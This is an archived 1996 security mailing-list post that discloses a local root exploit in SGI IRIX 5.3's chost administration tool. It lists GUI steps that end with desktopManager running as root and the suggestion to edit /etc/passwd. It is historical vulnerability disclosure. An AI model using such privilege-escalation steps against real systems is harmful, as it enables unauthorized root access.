TUCoPS :: SGI :: irix_cho.txt

SGI Irix chost exploit - Irix 5.3


               problems in /usr/Cadmin/bin for IRIX 5.3: EXPLOIT
                                       
   Grant Kaufmann (gkaufman@cs.uct.ac.za)
   Tue, 6 Aug 1996 14:45:10 +0200
   
As promised, the exploit for chost under IRIX 5.3. If someone
can verify any other versions of IRIX; 4.0.5F is not vulnerable.

--------
/usr/Cadmin/bin/chost
tools-primary user information
change information
OK (to root password, ie leave blank)
OK (to "password invalid")
Cancel
Double-click any share resource to bring up desktopManager running
as root. Try editing /etc/passwd

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH